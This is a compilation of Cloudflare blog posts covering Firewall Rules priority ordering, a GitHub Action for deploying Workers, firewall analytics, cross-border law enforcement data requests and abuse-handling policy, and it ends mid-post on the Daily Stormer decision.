In the past, all of our firewall rules had a single dimension to them, i.e. act on IP addresses. This meant that we had a single property of a single type, and whilst there were occasionally edge cases, for the most part there were strategies to answer the question "which is the most specific rule?". I.e. an IP address is more specific than a /24, which is more specific than a /8. Likewise, with URI matching, an overly simplistic strategy is that the longer a URI, the more specific it is.
And if we had two IP rules, then only one could ever have matched, as a request does not come from two IPs at once, so mutual exclusion is in effect.

The old system meant that, given two rules, we could implicitly and trivially say "this rule is most specific, so use the action associated with this rule".

With wirefilter powering Firewall Rules, it isn't obvious whether an IP address is more or less specific when compared to a URI. It gets even more complex when a rule can have negation, as a rule that matches a /8 is less specific than a rule that does not match a single IP (the whole address space except this IP). One of the gotchas of Firewall Rules is also a source of its power: you can invert your firewall into a positive security model.

As we couldn't answer specificity using the expression alone, we needed another aspect of the Firewall Rule to provide this guidance, and we realised that customers already had a mechanism to tell us which rules were important... the action.

Given a set of rules, we logically order them according to their action (Log has the highest priority, Block the lowest):

Log
Allow
Challenge (CAPTCHA)
JavaScript Challenge
Block

For the vast majority of scenarios this proves to be good enough.

What about when that isn't good enough? Do we have examples of complex configuration that break that approach? Yes!

Because the expression language within Firewall Rules is so powerful, and we can support many Firewall Rules, we can now create different firewall configurations for different parts of a web site, i.e. /blog could have wholly different rules than /shop, or for different audiences, i.e.
visitors from your office IPs might be allowed on a given URI, but everyone else trying to access that URI may be blocked.

In this scenario you need the ability to say "run all of these rules first, and then run the other rules".

In single-machine firewalls like iptables, the OS X firewall, or your home router's firewall, the rules are explicitly ordered, so that when the first rule matches, execution terminates and you never hit the next rule. When you add a new rule, the entire set of rules is republished, which helps guarantee this behaviour. But this approach does not work well for a cloud firewall, as a large website with many web applications typically also has a large number of firewall rules. Republishing all of these rules in a single transaction can be slow, and if you are adding lots of rules quickly this can lead to delays before the final state is live.

If we published individual rules and supported explicit ordering, we risked race conditions: two rules both configured in position 4 might exist at the same time, and the behaviour if they both matched a request would be non-determinable.

We solved this by introducing a priority value, where 1 is the highest priority and, as an int32, you can create low-priority rules all the way down to priority = 2147483647. Not providing a priority value is the equivalent of "lowest" and runs after all rules that have a priority.

Priority does not have to be a unique value within Firewall Rules. If two rules are of equal priority, then we resort to the order of precedence of the actions defined earlier.

This provides us a few benefits:

Because priority allows rules that share a priority to exist, we can publish rules one at a time... when you add a new rule, the speed at which we deploy it globally is not affected by the number of rules you already have.
If you have existing rules in a system that does sequentially order the rules, you can import those into Firewall Rules and preserve their order, i.e.
this rule should always run before that rule.

But you don't have to use priority exclusively for ordering; you can also use priority for grouping. For example, you may say that all spammers are priority = 10000 and all trolls are priority = 5000.

Finally... let's look at those fields again, e.g. http.request.path. Notice that http prefix? By following the naming convention Wireshark has (see their Display Filter Reference), we have not limited this firewall capability solely to an HTTP web proxy. It is a small leap to imagine that, if a Spectrum application declares itself as running SMTP, we could also define fields that understand SMTP and allow filtering of traffic on other application protocols, or even at layer 4.

What we have built in Firewall Rules gives us these features today:

A rich expression language capable of targeting traffic precisely and in real time
Fast global deployment of individual rules
A lot of control over the management and organisation of Firewall Rules

And in the future, we have a product that can go beyond HTTP and be a true cloud firewall for all protocols... the Cloudflare Firewall with Firewall Rules.
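The ordering scheme described above (numeric priority first, with the fixed action precedence breaking ties) can be sketched as follows. The enum and field names are illustrative, not Cloudflare's actual implementation:

```rust
// Sketch of rule ordering: sort by priority (1 = highest, missing =
// lowest), then break ties using the fixed action precedence
// (Log > Allow > Challenge > JS Challenge > Block).
#[derive(Debug, PartialEq, Eq, PartialOrd, Ord, Clone, Copy)]
enum Action {
    Log, // highest precedence (smallest in derived Ord)
    Allow,
    Challenge,
    JsChallenge,
    Block, // lowest precedence
}

#[derive(Debug)]
struct Rule {
    priority: Option<i32>, // None = "lowest", runs after all prioritised rules
    action: Action,
}

fn sort_key(rule: &Rule) -> (i64, Action) {
    // Map a missing priority past the end of the i32 range so it
    // always sorts after any explicit priority.
    let p = rule.priority.map(i64::from).unwrap_or(i64::from(i32::MAX) + 1);
    (p, rule.action)
}

fn main() {
    let mut rules = vec![
        Rule { priority: None, action: Action::Block },
        Rule { priority: Some(10000), action: Action::Challenge }, // spammers
        Rule { priority: Some(5000), action: Action::Log },        // trolls
        Rule { priority: Some(5000), action: Action::Block },      // equal priority: Log wins
    ];
    rules.sort_by_key(sort_key);

    let order: Vec<_> = rules.iter().map(|r| (r.priority, r.action)).collect();
    assert_eq!(order[0], (Some(5000), Action::Log));
    assert_eq!(order[1], (Some(5000), Action::Block));
    assert_eq!(order[2], (Some(10000), Action::Challenge));
    assert_eq!(order[3], (None, Action::Block));
}
```

Because ties are resolved deterministically by action, two rules published concurrently at the same priority never produce non-determinable behaviour.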

Deploying Workers with GitHub Actions + Serverless

If you weren't aware, Cloudflare Workers, our serverless programming platform, allows you to deploy code onto our 165 data centers around the world. Want to automatically deploy Workers directly from a GitHub repository? Now you can with our official GitHub Action. This Action is an extension of our existing integration with the Serverless Framework. It runs in a containerized GitHub environment and automatically deploys your Worker to Cloudflare. We chose to utilize the Serverless Framework within our GitHub Action to raise awareness of their awesome work and to enable even more serverless applications to be built with Cloudflare Workers. This Action can be used to deploy individual Worker scripts as well; the Serverless Framework is simply the deployment mechanism running in the background.

Before going into the details, we'll quickly go over what GitHub Actions are.

GitHub Actions

GitHub Actions allow you to trigger commands in reaction to GitHub events. Similar to many CI/CD tools, these commands run in an isolated container and can receive environment variables. Actions can trigger build, test, or deployment commands across a variety of providers, and they can be linked and run sequentially (i.e. "if the build passes, deploy the app"). You can pass any command to the container that enables your development workflow.

Actions are a powerful way to automate your workflow on GitHub, including automating parts of your deployment pipeline directly from where your codebase lives. To that end, we've built an Action to deploy a Worker to your Cloudflare zone via our existing Serverless Framework integration for Cloudflare Workers.
To visualize the entire flow, see below. To see some of the other Actions out there today, please see here.

Why use the Serverless Framework?

Serverless applications are deployed without developers needing to worry about provisioning hardware, capacity planning, scaling, or paying for equipment when the application isn't running. Unlike most providers, who ask you to choose a region for your serverless app to run in, all Cloudflare Workers deploy into our entire global network. The Serverless Framework is a popular toolkit for deploying serverless applications, and its advantage is that it offers a common CLI to use across the multiple providers which support serverless applications. In late 2018, Cloudflare integrated Workers deployment into the Serverless CLI; please check out our docs here to get started.

If you run an entire application in a Worker, there is no cost to a business when the application is idle. If the application runs on our network (Cloudflare has 165 PoPs as of writing this), the app can be incredibly close to the end user, reducing latency by proximity. Additionally, Workers can be a powerful way to augment what you've already built in an existing technology, moving just the authentication or performance-sensitive components into Workers.

Configuration

Configuration of the Action is straightforward, with the side benefit of giving you just a 'little bit'™ of exposure to the Serverless Framework if desired. A repo using this Action can contain just the Worker script to be deployed. If you feed the Action the right ENV variables, we'll take care of the rest. Alternatively, you can provide a serverless.yml in the root of your repo alongside your Worker if you want to override the defaults. Get started learning about our integration with Serverless here.

Your Worker script and optional serverless.yml are passed into the container which runs the Action for deployment.
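As an illustration, a minimal serverless.yml for a Workers deployment might look something like the sketch below. The service name, script name and environment variable names here are assumptions for the example, not the Action's documented defaults; check the repository's docs for the exact schema.

```yaml
# Hypothetical minimal config for the serverless-cloudflare-workers
# plugin; adjust names and variables to match your own setup.
service:
  name: hello-worker
  config:
    accountId: ${env:CLOUDFLARE_ACCOUNT_ID}
    zoneId: ${env:CLOUDFLARE_ZONE_ID}

provider:
  name: cloudflare

plugins:
  - serverless-cloudflare-workers

functions:
  helloWorld:
    # `worker` is the name the script is deployed under;
    # `script` refers to the script file (e.g. helloWorld.js) in the repo.
    worker: hello
    script: helloWorld
```

Keeping the credentials in environment variables (rather than in the file) is what lets the same config work locally and inside the Action's container.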
The Serverless Framework picks up these files and deploys the Worker for you. All the relevant variables must be passed to the Action as well, including various account identifiers and your API key. You can check out this tutorial from GitHub on how to pass environment variables to an Action (hint: use the secret variable type for your API key).

Support

The repository is publicly available here, and it goes over the configuration in more technical detail. Any questions or suggestions? Feel free to let us know!

New Firewall Tab and Analytics

At Cloudflare, one of our top priorities is to make our products and services intuitive so that we can enable customers to accelerate and protect their Internet properties. We're excited to launch two improvements designed to make our Firewall easier to use and more accessible, helping our customers better manage and visualize their threat-related data.

New Firewall tabs for ease of access

We have re-organised our features into meaningful pages: Events, Firewall Rules, Managed Rules, Tools, and Settings. Our customers will also see an Overview tab, which contains our new Firewall Analytics, detailed below.

All the features you know and love are still available, and can be found in one of the new tabs. Here is a breakdown of their new locations:

Feature → New Location
Firewall Event Log → Events (Overview for Enterprise only)
Firewall Rules → Firewall Rules
Web Application Firewall → Managed Rules
IP Access Rules (IP Firewall) → Tools
Rate Limiting → Tools
User Agent Blocking → Tools
Zone Lockdown → Tools
Browser Integrity Check → Settings
Challenge Passage → Settings
Privacy Pass → Settings
Security Level → Settings

If the new sub-navigation has not appeared, you may need to log in to the dashboard again or clear your browser's cookies.

New Firewall Analytics for analysing events and maintaining optimal configurations

Insights into security events are critical for monitoring the health of your web applications. Furthermore, distinguishing actual threats from false positives is essential for maintaining an optimal security configuration.
Today, we are very pleased to announce our new Firewall Analytics, which will help our Enterprise customers get detailed insights into firewall events, helping them to tailor their security configurations more effectively.

Our new Firewall Analytics enables our Enterprise customers to:

visualise and analyse Firewall Events in one place to better understand their threat landscape
identify, mitigate, and review attacks more effectively

After speaking with many of our customers, we learned a lot about their processes for identifying and analysing attacks, and the kinds of insights they needed to improve those processes. We then translated these learnings into useful features and charts that help answer some of the most common questions, such as "What kinds of security events occurred in a certain time frame?" and "What caused a spike in a certain type of security event?".

Firewall Analytics and Firewall configuration can be found together in the Firewall tab. A tight feedback loop between Firewall configuration and the resulting events allows for rapid iteration, ideal for security-focused teams.

To best demonstrate the power of Firewall Analytics, here's a workflow that answers a popular question our customers ask: "Why did I have a spike in threats?". In the screenshot below, we can see a set of activity which triggered a number of 'Block' events.

To minimize the possibility of polluting our TopN statistics with event types other than 'Block', and to get the most accurate diagnostic information, we need to filter down to just 'Block' actions.

Now that only Block events are displayed, checking the Service Breakdowns helps us identify which of our Firewall features was triggered. From the Events breakdown, we can see that the Block events were triggered by a Country Block configured within Access Rules.
Digging deeper and looking at our TopN breakdowns, we start to get a much more granular understanding of which networks, IPs, user agents, paths, etc. were targeted. From here, we can see that there are two specific IP addresses which were targeting my application at the path "/". To get the most detailed information, we can drill down further in the refreshed Firewall Event log, now controlled inline.

Whilst these TopNs and filters are great for clearly identifiable threats, they can also help identify false positives. Using the power of Cloudflare's filters, it is possible to add a user-defined filter, which can be a Ray ID, user agent or IP address.

This is just one example of how the new Firewall Analytics can help expedite the process of identifying and mitigating threats. Firewall Analytics is now live for all Enterprise customers. Let us know your feedback by reaching out to your Enterprise Account Team.

Digital Evidence Across Borders and Engagement with Non-U.S. Authorities

Since we first started reporting in 2013, our transparency report has focused on requests from U.S. law enforcement. Previous versions of the report noted that, as a U.S. company, we ask non-U.S. law enforcement agencies to obtain formal U.S. legal process before we provide customer data. As more countries pass laws that seek to extend beyond their national borders, and as we expand into new markets, the question of how to handle requests from non-U.S. law enforcement has become more complicated. It seems timely to talk about our engagement with non-U.S. law enforcement and how our practice is changing. But first, some background on the changes that we've seen over the last year.

Law enforcement access to data across borders

The explosion of cloud services -- and the fact that data may be stored outside the countries of residence of those who generated it -- has been a challenge for governments conducting law enforcement investigations. A number of U.S. laws, like the Stored Communications Act and the Electronic Communications Privacy Act, restrict companies from providing particular types of data, such as the content of communications, to any person or entity, including foreign law enforcement agencies, without U.S. legal process. To get access to electronic data stored outside their home borders, law enforcement agencies around the world have long used Mutual Legal Assistance Treaties (MLATs), which allow one country to ask for another country's help to get access to evidence. Unfortunately, the MLAT process can be slow and cumbersome. Countries frustrated by the inability of law enforcement to quickly gather evidence held outside their borders have taken matters into their own hands. Some have proposed laws mandating that important data about their citizens remain in country, where it can be easily accessed when requested.
Others have proposed laws that would allow law enforcement to get access to data wherever it is stored, which puts companies in the position of potentially violating one country’s laws in order to comply with another’s. In short, a new paradigm that allows law enforcement to access appropriate digital evidence across borders, with sufficient procedural safeguards to protect our users’ privacy and ensure due process, is long overdue.

U.S. CLOUD Act

In March 2018, the U.S. Congress passed the Clarifying Lawful Overseas Use of Data (CLOUD) Act as part of a large bill funding the government. The idea behind the law is that governments that protect their citizens’ due process rights and civil liberties should be able to get access to electronic content related to their citizens when conducting law enforcement investigations, wherever that data is stored. The CLOUD Act anticipates that the U.S. government will enter into agreements with other countries’ governments to give each of the participating governments access to data stored in other participating countries for the purpose of investigating and prosecuting certain crimes. Under the law, the U.S. government will have to determine that a country has “robust substantive and procedural protections for privacy and civil liberties” before entering into an agreement with that country. After a country enters a formal agreement with the United States, U.S. companies would no longer be restricted by U.S. law from providing that country’s law enforcement with access to content data in response to a valid law enforcement request. From a practical standpoint, the CLOUD Act envisions that U.S. companies like Cloudflare will be providing information directly to governments that have entered into agreements with the U.S. government. 
The idea is to change the relevant question away from “where is the data stored?” to “is the person being investigated a citizen or resident of the country asking for the information?”, recognizing every government’s right to investigate crimes that occur within its borders or affect its citizens.

Movement in Europe

Governments outside the United States have also moved forward with proposals that would provide law enforcement agencies authority to obtain information related to their citizens across borders. The United Kingdom, for example, has been working to update its laws and negotiate a bilateral agreement with the United States for access to data maintained by U.S. companies, consistent with the framework established in the CLOUD Act. The European Union has also been active in moving forward with a framework on obtaining electronic evidence across borders. Much like the U.S. CLOUD Act, the European Commission’s eEvidence Regulation would allow EU Member States to seek digital evidence outside of their national borders provided that fundamental rights are protected. The European Commission also envisions entering into negotiations with U.S. authorities on data sharing arrangements under the mandate of EU Member States.

So where does all of this leave us?

As a U.S. company that stores customer records inside the United States, Cloudflare has long held the view that non-U.S. governments should have to follow U.S. due process requirements in order to obtain any records about our customers. When non-U.S. governments have come to us requesting records, we have explained the nature of our service and, to the extent they were interested in obtaining data, encouraged them to submit a request to the U.S. Department of Justice through the MLAT process. But it’s important to note that these processes serve an important function and are not just intended to delay the efforts of foreign law enforcement. 
They have helped us address some of the more challenging requests that we have seen. Let’s say, for example, law enforcement from an otherwise-respected nation sent us a court order demanding information about websites run by a vocal group of dissenters or even the organizers of a separatist referendum, and also asked us to redirect that website to a location of their choosing. In that case, we would direct that foreign agency to submit an MLAT request. In situations like this, we might not receive subsequent legal process from the U.S. government, either because the government declined to ask the Department of Justice for an MLAT related to activity that could be viewed as political or because the Department of Justice declined to process it. With the changing legal and policy landscape, as well as our increased presence in non-U.S. locations, we think it’s time to take a step towards the new framework that is taking shape.

What type of information could we provide to non-U.S. law enforcement?

The overwhelming majority of information that U.S. law enforcement seeks from Cloudflare through legal process is what we consider to be basic subscriber data -- the type of information that customers give us when they sign up for service. That includes things like name, email address, physical address, phone number, the means and source of payment, and non-content information about a customer’s account, such as data about login times and IP addresses used to log in to the account. Although we consider this account information to be private customer data, worthy of protection, we share the commonly held view that it is less sensitive than information considered to be content, such as email communications or documents created by users. In fact, U.S. law allows law enforcement to compel us to provide basic subscriber data with a subpoena, a type of legal process that does not require prior judicial review. 
Recent policy discussions have convinced us that there may be situations where it is appropriate to provide this type of basic subscriber information to non-U.S. law enforcement in response to non-U.S. legal process similar to a subpoena, a view in line with that of many other tech companies. We may therefore respond to requests for subscriber information if a government is seeking information about a crime in its country or about its citizens, we have employees in the country, and appropriate due process requirements and international standards have been met. We will also consider whether the country has signed a CLOUD Act agreement with the United States. The CLOUD Act and other existing U.S. laws govern the provision of more sensitive, content data to non-U.S. law enforcement. U.S. companies are legally prohibited from providing content data to a non-U.S. government absent a U.S. CLOUD Act agreement with that country. Given the nature of our service, however, we rarely have records that constitute content that we could provide to law enforcement regardless of jurisdiction.

Overall Principles We Follow

When we talk about our relationship with law enforcement, we often say that it is not Cloudflare's intent to make law enforcement's work any harder or any easier. We respect both that law enforcement agencies have a job to do and that our customers have rights relating to how their data is shared with law enforcement. Regardless of what government is asking, there are certain standards we believe must be followed before we turn over customer data. Our goal is to maintain a healthy and open relationship with law enforcement officials so that they understand and respect our positions on each of these standards. The principles which remain important to us are as follows:

Require Due Process. Cloudflare requires government entities seeking access to personal customer information to obtain appropriate legal process, including prior independent judicial review of any request for content.

Provide Notice. We believe our customers deserve to be notified when we receive legal requests for their information, whether the requests come from law enforcement or private parties involved in civil litigation. We will provide that notice before we disclose the information, unless prohibited by law.

Protect Privacy and User Rights. Whether inside or outside the United States, Cloudflare will fight law enforcement requests that we believe are overbroad, illegal, or wrongly issued. This includes requests to delay or prevent notice that appear unnecessarily broad, given the government interests at stake.

Be Transparent. We believe the ability to report on the numbers and types of requests that we get from law enforcement, as well as how we respond, is critical to building trust with our customers. We will fight requests that unnecessarily restrict our ability to be transparent with our users.

Consistent with the last standard, we also intend to update our transparency report to reflect any requests that we receive from non-U.S. law enforcement authorities, whether for user information or anything else.

Out of the Clouds and into the weeds: Cloudflare’s approach to abuse in new products

In a blog post yesterday, we addressed the principles we rely upon when faced with numerous and various requests to address the content of websites that use our services. We believe the building blocks that we provide for other people to share and access content online should be provided in a content-neutral way. We also believe that our users should understand the policies we have in place to address complaints and law enforcement requests, the type of requests we receive, and the way we respond to those requests. In this post, we do the dirty work of addressing how those principles are put into action, specifically with regard to Cloudflare’s expanding set of features and products.

Abuse reports and new products

Currently, we receive abuse reports and law enforcement requests on fewer than one percent of the more than thirteen million domains that use Cloudflare’s network. Although the reports we receive run the gamut -- from phishing, malware or other technical abuses of our network to complaints about content -- the overwhelming majority are allegations of copyright violations or violations of other intellectual property rights. Most of the complaints that we receive do not identify concerns with particular Cloudflare services or products. In the last year or so, we’ve also launched a variety of new products, including our video product (Cloudflare Stream), a serverless edge computing platform (Cloudflare Workers), a self-serve registrar service, and a privacy-focused recursive resolver (1.1.1.1), among others. Each of these services raises its own complex set of questions. There is no one-size-fits-all solution to address possible abuse of our products. Different types of services come with different expectations, as well as different legal and contractual obligations. 
Yet as we discussed in relation to our focus on transparency on Monday, being fully transparent means being consistent and predictable so our users can anticipate how we will respond to new situations.

Developing an approach to abuse

To help us sort through how to address both complaints and law enforcement requests when we introduce new products or features, we ask ourselves four basic sets of questions about the relationship between the service we’re providing and potential complaints about content:

First, how are Cloudflare’s services interacting with the website content? For example, are we doing anything more than providing security and acting as a reliable conduit from one location to another? Are we providing definitive storage of content? Did we provide the website its domain name through our registrar service? Is the Cloudflare service or product doing anything that could be seen as organizing, analyzing, or promoting content?

Second, what type of action might a law enforcement or private complainant want us to take, and what are the consequences of it? What sort of information might law enforcement request -- private information about the user, content of what was sent over the Internet, or logs that would track activity? Will third parties request information about a website; would they request removal of content from the Internet? Would removing our services address the problem presented?

Third, what laws, regulations or contractual requirements apply? Does the nature of our interaction with the online content impact our legal obligations? Has the law enforcement request or regulation satisfied basic principles of the rule of law or due process?

Fourth, will our response to the matter presented scale to address the variety of different requests or complaints we may receive over time, covering a variety of different subject matters and viewpoints? Can we craft a principled and content-neutral process to respond to the request? 
Would our response have an overbroad impact, either by impacting more than the problematic content or changing the Internet in jurisdictions beyond the one that has issued the law or regulation at issue?

Although those preliminary questions help us determine what actions we must take, we also do our best to think about the broader implications on the Internet of any steps we might take to address complaints. So how does this work in practice?

Response to abuse complaints for customers using our proxy and CDN services

People often come to Cloudflare with abuse complaints because our network sits in front of our customers’ sites in order to protect them from cyber attacks and to improve the performance of their websites. There aren’t a lot of laws or regulations that impose obligations to address content on those providing security or CDN services, for good reason. Most people complaining about content are looking for someone who can take that content off the Internet entirely. As we’ve talked about on other occasions, Cloudflare is unable to remove content that we don’t host, so we try to make sure that the complaint gets to its intended audience -- the hosting provider, who has the ability to remove the material from the Internet. As described on our abuse page, complaining parties automatically receive information about how to contact the hosting provider, and unless the complaining party requests otherwise, abuse complaints are automatically forwarded to both the website owner and the hosting company to allow them to take action.

This approach has another benefit, consistent with the fourth set of questions we ask ourselves. It prevents addressing content with an unnecessarily blunt tool. Cloudflare is unable to remove its security and CDN services from only a sliver of problematic content on a website. If we remove our services, it has to be from an entire domain or subdomain, which may cause considerable collateral damage. 
For example, think of the vast array of sites that allow individual independent users to upload content (“user-generated content”). A website owner or host may be able to curate or deal with specific content, but if companies like Cloudflare had to respond to allegations of abuse by a single user’s upload of a single piece of concerning content by removing our core services from an entire site, making it vulnerable to a cyberattack, those sites would be much more difficult to operate, and the content contributed by all other users would be put at risk. Similarly, there are a number of different infrastructure services that cooperate to make sure each connection on the Internet can happen successfully -- DNS, registrars, registries, security, etc. If each of the providers of those services, any one of which could put the entire transmission at risk, applies blunt tools to address content, then the aperture of what content will stay online will get smaller and smaller. Those are bad results for the Internet. Actions to address troubling content online should focus narrowly on the actual concern to avoid unintended collateral consequences.

While we are unable to remove content we do not host, we are able to take steps to address abuse of our services, such as phishing and malware attacks. Phishing attacks typically fall into two buckets: a website that has been compromised (unintentional phishing), or a website solely dedicated to intentionally misleading others to gather information (intentional phishing). These buckets are treated differently. We discussed earlier that we aim to use the most precise tools possible when addressing abuse, and we take a similar approach for unintentional phishing content. If a website has been compromised (typically through an outdated CMS), we can place a warning interstitial page in front of that specific phishing content to protect users from accidentally falling victim to the attack. 
In the majority of situations, this action is taken at a URL level of granularity. In the case of intentional phishing attacks, such as a domain like my-totally-secure-login-page{.}com where our Trust & Safety team is able to confirm the presence of phishing content on the website, we take broader action, including a domain-wide interstitial warning page (effectively *my-totally-secure-login-page{.}com/*), and in some cases we may terminate our services to the intentionally malicious domain. To be clear though, this does not remove the phishing content, which remains hosted by the website’s hosting provider. Ultimately, action still needs to be taken by the website owner or hosting provider to fully remove the underlying issue.

Response to complaints about content stored definitively on our network

We think our approach requires a different set of responses for the small, but growing, number of Cloudflare products that include some sort of storage. Cloudflare Stream, for example, allows users to store, transcode, distribute and play back their videos. And Cloudflare Workers may allow users to store certain content at the edge of our network without a core host server. Although we are not a website hosting provider, these products mean we may in some cases be the only place where a certain piece of content is stored. When we are the definitive repository for content through any of our services, Cloudflare will carefully review any complaints about that content and may disable access to it in response to a valid legal takedown request from either government or private actors. Most often, these legal takedown requests are from individuals alleging copyright infringement. Under the U.S. Digital Millennium Copyright Act, there is a specific process online storage providers follow to remove or disable access to content alleged to infringe copyright and provide an opportunity for those who post the material to contest that it is infringing. 
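The two interstitial granularities for phishing described above -- URL-level for a compromised site, domain-wide for a dedicated phishing domain -- can be illustrated with a minimal sketch. The rule sets, URLs, and helper function here are hypothetical, not Cloudflare's implementation:

```python
# Illustrative sketch of deciding interstitial scope for a requested URL.
from urllib.parse import urlsplit

# Hypothetical rule sets, following the two buckets in the text.
URL_LEVEL_BLOCKS = {"https://blog.example.com/wp-content/fake-login.html"}
DOMAIN_WIDE_BLOCKS = {"my-totally-secure-login-page.com"}

def interstitial_scope(url):
    """Return 'url', 'domain', or None for a requested URL."""
    if url in URL_LEVEL_BLOCKS:
        return "url"      # unintentional phishing: warn on this page only
    host = urlsplit(url).hostname or ""
    if host in DOMAIN_WIDE_BLOCKS:
        return "domain"   # intentional phishing: warn on the whole domain
    return None           # no warning page
```

The design point is precision: on a compromised site, only the injected phishing page gets the warning, while the rest of the site (and its legitimate users) is untouched.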
We have already begun implementing this process for content stored on our network. That’s why we’ve added a new section of our transparency report on requests for content takedown pursuant to U.S. copyright law for content that is stored on our network. We haven’t received any government requests yet to take down content stored on our network. Given the significant potential impact on freedom of expression from a government ordering that content be removed, if we do receive those requests in the future, we will carefully analyze the factual basis and legal authority for the request. If we determine that the order is valid and requires Cloudflare action, we will do our best to address the request as narrowly as possible, for example by clarifying overbroad requests or limiting blocking of access to the content to those areas where it violates local law, a practice known as “geo-blocking”. We will also update our transparency report on any government requests that we receive in the future and any actions we take.

Response to complaints about our registrar service

If you sign up for our self-serve registrar service, you’re legally bound by the terms of our contract with the Internet Corporation for Assigned Names and Numbers (ICANN), a non-profit organization responsible for coordinating unique Internet identifiers across the world, as well as our contract with the relevant domain name registry. Our registrar-focused web page for abuse reporting does not reference abuse complaints about a website’s content. In our role as a domain registrar, Cloudflare has no control or ability to remove particular content from a domain. We would be limited to simply revoking or suspending the domain registration altogether, which would remove the website owner’s control over the domain name. 
Such actions would typically only be taken at the direction of the relevant domain name registry, in accordance with the registration rules associated with the Top Level Domain, or, more usually, to address incidents of abuse raised by the registry or ICANN. We therefore treat content-related complaints submitted based on our registrar services the same way we treat complaints about content for sites using our CDN or proxy services: we forward them to the website owner and the website hosting company to allow them to take action, or we work in tandem with the relevant registry and at their direction.

Running a registrar service comes with other legal obligations. As an ICANN-accredited registrar, part of our contractual obligations include adhering to third-party dispute resolution processes regarding trademark disputes, as handled by providers such as the World Intellectual Property Organization (WIPO) and the National Arbitration Forum. Also, we continue to be part of the ICANN community discussions on how best to handle the collection, publication and provision of access to personal data in the WHOIS database in a manner consistent with the EU’s General Data Protection Regulation (GDPR) and other privacy frameworks. We will provide more updates on that front when the discussions have ripened.

Response to complaints about IPFS

Back in September, we announced that Cloudflare would be providing a gateway to the InterPlanetary File System (IPFS). Cloudflare’s IPFS gateway is a way to access content stored on the IPFS peer-to-peer network. Because Cloudflare is not acting as the definitive storage for the IPFS network, we do not have the ability to remove content from that network. We simply operate as a cache in front of IPFS, much as we do for our more traditional customers. Because content is stored on potentially dozens of nodes in IPFS, if one node that was caching content goes down, the network will just look for the same content on another node. 
That fact makes IPFS exceptionally resilient. That same resilience, however, means that unlike with our traditional customers, with IPFS there is no single host to inform of a complaint about content stored on the IPFS network. Cloudflare often has no knowledge of who the owner of content being accessed through the gateway is, which makes it impossible to notify the specific owner when we receive a complaint.

The law hasn’t yet quite caught up with distributed networks like IPFS, and there’s a notable debate among IPFS users about how best to deal with abuse. Some argue that having problematic content stored on IPFS will discourage adoption of the protocol, and advocate for the development of lists of problematic hashes that IPFS gateways could choose to block. Others point out that any mechanism intended to block IPFS content will itself be subject to abuse. We don’t have the answer to that debate, but it does demonstrate to us the importance of being thoughtful about how we proceed. For the time being, our plan is to respond to U.S. court orders that require us to clear our cache of content stored on IPFS. More importantly, however, we intend to report in future transparency reports on any law enforcement requests we receive to clear our IPFS cache, to ensure continued public discussion.

Cloudflare Resolvers: 1.1.1.1 and the Cloudflare Resolver for Firefox

In April of last year, we launched our first DNS resolver, 1.1.1.1. In June, we partnered with Mozilla to provide direct DNS resolution from within the Firefox browser using the Cloudflare Resolver for Firefox. Our goal with both resolvers was to develop fast DNS services that were focused on user privacy. We often get questions about how we deal with both abuse complaints and law enforcement requests related to our resolvers. Both of our resolvers are intended to provide only direct DNS resolution. In other words, Cloudflare does not block or filter content through either 1.1.1.1 or the Cloudflare Resolver for Firefox. 
If Cloudflare were to receive a request from a law enforcement or government agency to block access to domains or content through one of our resolvers, Cloudflare would fight that request. At this point, we have not yet received any government requests to block content through our resolvers. Cloudflare would also document any request to block content from our resolvers in our semi-annual transparency report, unless we were legally prohibited from doing so. Similarly, Cloudflare has not received any government requests for data about the users of our resolvers, and would fight such a request if necessary. Given our public commitment not to retain any personally identifiable information for more than 24 hours, we believe it is unlikely that we would have any information even if asked. Nonetheless, if we were to receive a government request for data about a resolver user, we would document the request in our transparency report, unless legally prohibited from doing so.

The long road ahead

Although new products offered by Cloudflare in the future, as well as the legal and regulatory landscape, may change over the years, we expect that our approach to thinking about new products will stand the test of time. We’re guided by some central principles -- allowing our infrastructure to be as neutral as possible, following the rule of law or requiring due process, being open about what we’re doing, and making sure that we’re consistent regardless of the wide variety of issues we face. And we will work hard to make sure that doesn’t change, because even the smallest tweaks to the way we do things can have a significant impact at the scale we operate.
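Returning to the IPFS gateway discussion above: the hash-blocklist idea debated in the IPFS community, combined with the cache-clearing response to court orders, could be sketched roughly as follows. The CIDs, cache structure, and function names are hypothetical illustrations, not how Cloudflare's gateway actually works:

```python
# Minimal sketch of a gateway that refuses to serve content identifiers
# (CIDs) on a blocklist and purges them from its own cache. Note that,
# as the text explains, this only affects this gateway's cache -- the
# content may still exist on other IPFS nodes.

BLOCKED_CIDS = {"QmHypotheticalBadHash0000000000000000000000001"}

def serve_from_gateway(cid, cache):
    """Return cached bytes for a CID, or None if it is blocklisted."""
    if cid in BLOCKED_CIDS:
        cache.pop(cid, None)   # clear our cache, as a court order might require
        return None            # refuse to serve through this gateway
    return cache.get(cid)

# Example cache with one permitted and one blocklisted entry.
cache = {
    "QmHypotheticalGoodHash000000000000000000000001": b"hello",
    "QmHypotheticalBadHash0000000000000000000000001": b"bad",
}
```

This also illustrates why the approach is narrow by design: only lookups through a cooperating gateway are affected, which is precisely the limited scope of action a cache operator has.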

The Serverlist Newsletter 2nd Edition: Available Now

Check out our second edition of The Serverlist below. Get the latest scoop on the serverless space, get your hands dirty with new developer tutorials, engage in conversations with other serverless developers, and find upcoming meetups and conferences to attend. Sign up below to have The Serverlist sent directly to your mailbox.

Unpacking the Stack and Addressing Complaints about Content

Although we are focused on protecting and optimizing the operation of the Internet, Cloudflare is sometimes the target of complaints or criticism about the content of a very small percentage of the more than thirteen million websites that use our service. Our termination of services to the Daily Stormer website a year and a half ago drew significant attention to our approach to these issues and prompted a lot of thinking on our part. At the time, Matthew wrote that calls for service providers to reject some online content should start with a consideration of how the Internet works and how the services at issue up and down the stack interact with that content. He tasked Cloudflare’s policy team with engaging broadly to try and find an answer. With some time having passed, we want to take stock of what we’ve learned and where we stand in addressing problematic content online.

The aftermath of the Daily Stormer decision

The weeks immediately following the decision in August 2017 were filled with conversations. Matthew made sure the Cloudflare team accepted every single invitation to talk about these issues; we didn’t simply put out a press release or “no comment” anyone. Our senior leadership team spoke with the media and with our employees -- some of whom had received threats related both to Cloudflare’s provision of services to the Daily Stormer and to the termination of those services. On the policy side, we spoke with a broad range of ideologically diverse advocacy groups who reached out to alternatively congratulate us or chastise us for the decision. As the time stretched into months, the conversations changed. 
